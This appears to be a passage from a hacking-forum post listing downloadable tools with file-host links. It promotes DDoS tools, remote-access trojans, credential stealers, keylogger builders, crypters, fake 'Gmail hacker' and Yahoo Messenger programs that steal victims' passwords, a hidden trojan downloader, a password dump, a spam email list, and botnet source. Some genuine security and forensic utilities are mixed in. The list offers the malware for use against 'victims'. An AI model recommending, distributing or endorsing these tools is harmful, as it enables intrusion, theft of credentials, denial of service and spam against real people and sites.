14 - RAT proxy -- A tool to proxify yourself.Full info. attached.

http://uploading.com/files/64125a83/rat%2Bproxy.rar/

15 - Multi Proxy --Changes Your proxy on just one click or every few seconds.
http://uploading.com/files/7d5m5c98/multi%2Bproxy.rar/

16 - Jasager_Firmware_1.0 -- Its a Wifi MitM Tool for faking Your Access Point,it has
lots of deadly features.
http://uploading.com/files/14bm1md3/jasa...0.tar.rar/

17 - Hide my windows installer -- Hides your running programs instantly

http://uploading.com/files/827m8b65/hide...aller.zip/

SECURITY TOOLS

18 - TrueCrypt Setup 6.2a -- It uses a powerfull encryption system used by
government and agencies to encrypt your data.

http://uploading.com/files/d292b4a1/True...B6.2a.rar/

19 - NortOn GoBack -- This tools has saved me lots of time from serious error,this is a must have tools,it can
restore your pc to exact date and time.Its 1000 times better than system restore.

http://uploading.com/files/c197mf2m/Nort...B2005.rar/

20 - Anti_keylogger_sheild_v3.0 -- Now you don't have to worry about keyloggers and stealers,very usefull to have.

http://uploading.com/files/b9daed94/Anti..._v3.0.rar/

21 - Process Explorer -- A utility for listing all the processes running.

http://uploading.com/files/a42dd34f/Pokm...lorer.rar/

REVERSE ENGINEERING TOOLS

22 - Resource Hacker -- A good tool for reverse engg.

http://uploading.com/files/e3c829a6/ResHacker.rar/

23 - xvi32 -- A easy to use hexing tools.Very handy tool.

http://uploading.com/files/43c594a9/xvi32.rar/

24 - PE.Explorer for Reverse engg. -- More advanced tool for hexing.

http://uploading.com/files/461f31fe/PE.E...engg..zip/

DDOS TOOLS

25 - ProDoS v1.0 -- Powerfull tool to ddos websites.Just like site hog

http://uploading.com/files/b9fb62mf/ProDoS%2Bv1.0.zip/

26 - Ddos any site in this WWW -- Title says it all.

http://uploading.com/files/67cmb1f7/Ddos...2BWWW.rar/

27 - Site_Hog_v1 -- One of the most powerfull ddos tool.

http://uploading.com/files/e2e8f85e/Site...lease.rar/

28 - BFF DoS (Ping) v1.0 -- A good ddoser by BFF Productions

http://uploading.com/files/3838478a/BFF%...Bv1.0.rar/

29 - zDoS -- Again a powerfull ddoser.

http://uploading.com/files/4f9fd9ed/zDoS.rar/

30 - Secret Downloader -- Makes your victim download a trojan and run it hidden.

http://uploading.com/files/44b5eeb8/Tiny...r_V31.rar/

NEWLY ADDED TOOLS

31 - MD5 CRACKER BY XDEMO -- A good md5 Cracker.

http://uploading.com/files/a2e6848f/MD5CRACK.rar/

32 - PHISH GRABBER -- This tool will try to brute directories and files for the password log.In short it will hijack someone elses phishing log and their "hard work".
OCX and premade work list is included

http://uploading.com/files/c723368b/PHIS...ABBER.rar/

33 - MASSIVE XXX PASSWORDS DUMP -- TITLE SAYS IT ALL

http://uploading.com/files/b422251c/MASS...BDUMP.rar/

35 - KeyScrambler -- It encrypts all the keys you presses on the keyboard thereby protecting you from keyloggers,its a very usefull tool and it works great for me.

http://uploading.com/files/311a5f23/KeyS...Setup.rar/

36 - FUD GMAIL HACKER -- Awesome tool to hack gmail passwords,just needed little social engg.It makes victim feel that he/she is hacking a gmail id.

http://uploading.com/files/e2a839ee/Gmail_Hacker.rar/

37 - VNC CLIENT FOR YOUR MOBILE -- A VNC Client for J2ME (Java 2 Mobile Edition)

http://uploading.com/files/8816af8f/VNC-...40519.rar/

★ ULTIMATE TOOLS PACK [ PART -2 ] ★

38 - Hacker's Browser v2.0 by Alpha*** --

http://img20.imageshack.us/img20/5996/screenshotouy.jpg
- Built in milw0rm search
- Built in who.is
- Built in Reverse ip
and more features.

http://uploading.com/files/4a1m7f8a/Hack...ha***.rar/

39 - Private ddos tool by pureedee v3.0 -- One of the most powerfull ddos tool.Send 50,000 syn packets in a sec.
http://uploading.com/files/47222f78/Priv...Bv3.0.rar/
40- FUD CRYPTER - TITLE SAYS IT ALL.
http://uploading.com/files/12144f18/FudC...p2009.rar/

41 - HACKER'S ASSISTANT [NOT FUD]
http://uploading.com/files/13f9mb48/Hack...stant.rar/

42 - CREDIT CARD PAYMENT [SECURE AND CLEAN] -- You can directly pay to anyone with help of this tool.
http://uploading.com/files/mb5839d7/Cred...52529.rar/

43- SMS BOMBER [CLEAN] -- One of the best sms bomber i have seen,it supports tons of carriers,

http://uploading.com/files/87888a86/my-sms.rar/

44 - SERVER ATTACK TOOL [SOURCE CODE] -- SOURCE CODE OF A POWERFULL DDOS TOOL.
http://uploading.com/files/92e1cfbf/serv...ource.rar/

45 - TAKE DOWN SMALL WEBSITES [CLEAN] -- IT CAN TAKE DOWN SMALL WEBSITES DOWN IN SECONDS.
http://uploading.com/files/3am5m17e/take...sites.rar/

46 - ROOT MULTI ACCOUNTS CHECKER -- Its the best account checker out there,cancheck the accounts of about 22 sites including paypal,rapidshare etc.

http://uploading.com/files/e5fmbce9/Root...ecker.rar/

47 - EXPLOIT FOR GRABING USER AND PASS OF CPANEL + ITS HIGH QUALITY VIDEO TUTORIAL -- TITLE SAYS IT ALL.
http://uploading.com/files/7f14884m/grab...panel.rar/

48 - Email hacking SOftware by Ny.xXBRONX -- Very good tool which Makes victim think that he is hacking and email id and grabs his/her password and sends it to you.
http://uploading.com/files/f745cbc2/Emai...BRONX.rar/

49 - GhonZilla stealer -- Steales keys and other things
http://uploading.com/files/d18f8378/Ghon...ealer.rar/

50 - FACEBOOK FOREVER ACCOUNT FREEZER -- TITLE SAYS IT ALL.
http://uploading.com/files/7dm34b2a/face...eever.rar/

51 - Albertino_KeyLogger_Creator [CLEAN] -- Its one of the most wanted keylogger.
http://uploading.com/files/2999m21d/Albe...eator.rar/

52 - Cigi Cigi VIP RAT -- It might be detectable but has lots of features and is not common.
http://uploading.com/files/5ea9d176/Cigi...2BRAT.rar/

53 - AUTO POSTER [CLEAN] -- THIS IS A MUST HAVE TOOL,IT CAN INCREASE YOUR DOWNLOADS INCREASE YOUR EARNINGS DRASTICALLY.IT AUTOMATICALLY POSTS YOUR DOWNLOAD LINK TO TONS OF FORUMS,ITS A BEST TOOL FOR UPLOADERS.
http://uploading.com/files/76ed84a6/auto%2Bposter.rar/

54 -Detect it easy --It can detect weather a file is binded or not,i have not scanned it,so scan it before use,it should be clean.
http://uploading.com/files/2e4e8be4/Dete...Beasy.rar/

55 - HACKING A SITE WITH SQL INJECTION AND UPLOADING A SHELL IN JOOMLA ADMIN PANEL [COMPRESSED] -- A GOOD AND INFORMATIVE TUT,SHOULD GIVE IT A LOOK,67.9 mb compressed to 1.3 mb only.
http://uploading.com/files/883f74d5/adva...oomla.rar/

56 - INTERNET LOCK -- If you ever feels any suspicious internet activity it can be blocked with just one click thereby protecting you from stealing of your information.
http://uploading.com/files/9m92e339/inte...Block.rar/

57 - b3y0nd mail bomber -- For bombing with tons of mails.
http://uploading.com/files/1m33f1m5/b3y0...omber.rar/

58 - SIGNATURE MAKER -- A VERY HANDY TOOL TO MAKE YOUR SIGNATURE FAST AND EASILY.
LINK REMOVED,I WILL POST IT AS SOON AS I'LL FIND A GOOD ONE.

59 - HH STEALER [CLEAN] -- Good stealer to steal passwords.Scan is attached.
http://uploading.com/files/e743e9bd/HH%2BSTEALER.rar/

60 - Multi Account Checker - A good account checker which can check weather an account is working or dead.
http://uploading.com/files/86a3cb2c/Mult...Bv1.0.rar/

61 - ADMIN PAGE FINDER [CLEAN] -- SMALL AND FAST TOOL WHICH CAN FIND THE ADMIN LOGIN OF ANY SITE.
http://uploading.com/files/bf986d1c/Admi...inder.rar/

★ ULTIMATE TOOLS PACK [ PART -3 ] ★
62- Yahoo! Messenger Fake 3.2 -- STEALS CHATS AND PASSWORDS AND SENDS IT TO YOU,IT LOOKS EXACTLY LIKE YAHOO MESSENGER.

http://uploading.com/files/a12ebeb2/Yaho...2B3.2.rar/

FORENSIC TOOLS

63-USB HISTORY -- TELL ALL THE FILES WHICH WERE KEPT IN THE USB STICK,A VERY GOOD AND IMPRESSIVE TOOL.

http://uploading.com/files/288e32cb/usb-...%2Br1.rar/

64-ADS LOCATOR -- Alternate Data Streams,AGAIN A VERY GOOD FORENSIC TOOL.
Its a tool that can be used to find files that have alternate ADS streams attached

http://uploading.com/files/ab171935/ads%...B2004.rar/

65-DISK INVESTIGATOR -- File-Slack-AnalyzeR,USED BY MANY FORENSIC COMPANIES TOO.

http://uploading.com/files/6bec2f6a/disk...gator.rar/

66-WINDOWS FILE ANALYSER -- ANALYSES ANY FILE FOR HIDDEN DATA IN IT.

http://uploading.com/files/mm4ed2ba/wind...2B1.0.rar/

67-NETWORK MINER -- I THINK EVERYONE MUST BE KNOWING ABOUT IT.

http://uploading.com/files/51615a66/Netw...B0.87.rar/

68-SYSTEM REPORT 3.5 -- ANALYSES AND GIVE A DETAILED REPORT OF ANY SYSTEM UNDER INVESTIGATION.

http://uploading.com/files/85fd1d2m/syst...2B2.5.rar/

MISC. TOOLS

69-(Competition) IRCbot -- TITLE SAYS IT ALL

http://uploading.com/files/e65cf1f4/%252...RCbot.rar/

70-ADMIN LOGIN FINDER SOURCE -- TITLE SAYS IT ALL.

http://uploading.com/files/3629a6a2/ADMI...OURCE.rar/

71 -EMAIL EXTRACTOR SOURCE -- EXTRACTS EMAILS FOR WEBSITES.

http://uploading.com/files/a1b2d3cd/Emai...ource.rar/

72-TWENTY MILLION EMAIL LIST + MASS EMAIL BOMBER -- MUST HAVE FOR ANY SPAMMER.

http://uploading.com/files/m5169de8/20.0...llist.rar/

73-ZIXT'S Botnet Source -- A GOOD BOTNET

http://uploading.com/files/f669adb5/Zixt...ource.rar/

74-PHP SPY BOT SCRIPT -- USE IT TO KNOW WHAT IT IS

http://uploading.com/files/6mem42bd/php%...cript.rar/

75-SAFE0VER SHELL - SAFE MODE BYPASS BY EVILCODER -- TITLE SAYS IT ALL

http://uploading.com/files/de9df5ab/Safe...c0der.rar/

76-REERAR -- A VERY HANDY TOOL FOR CRACKING RAR PASSWORDS.

http://uploading.com/files/e9d7b9e6/ReeRar.rar/

77 -Mayoko.v1.1.5 Incl Keymaker -- SEARCH RAPIDSHARE DATABASE,A VERY HANDY TOOL.

http://uploading.com/files/7f733d6f/Mayo...maker.rar/

78-MEDIAVLE bluescan_setup -- BLUETOOTH ATTACKER,CAN DO BLUE-BUG AND BLUE-SNARFING ATTACKS TOO.

http://uploading.com/files/986c711f/bluescan_setup.rar/

79- HISTORIAN -- TELLS ALL THE DELETED HISTORY OF ANY SYSTEM.

http://uploading.com/files/af56bb2b/hist...2B1.4.rar/

80-HYDRO PUMP -- A VERY GOOD AND IMPRESSIVE TOOL FOR ADDING BYTES TO ANY KIND OF FILE.

http://uploading.com/files/bf87e7dm/HydroPUMP_.rar/

81-BEAVERS PIC HUNTER -- SEARCHES FOR ALL THE PICS ON THE VICTIM'S PC AND UPLOAD IT TO YOUR FTP .

http://uploading.com/files/b57878e4/Beav...unter.rar/

82-SYS FLOOD -- A VERY POEWRFULL TOOL FOR DDOSING.

http://uploading.com/files/f46c49m1/SYN-flood.rar/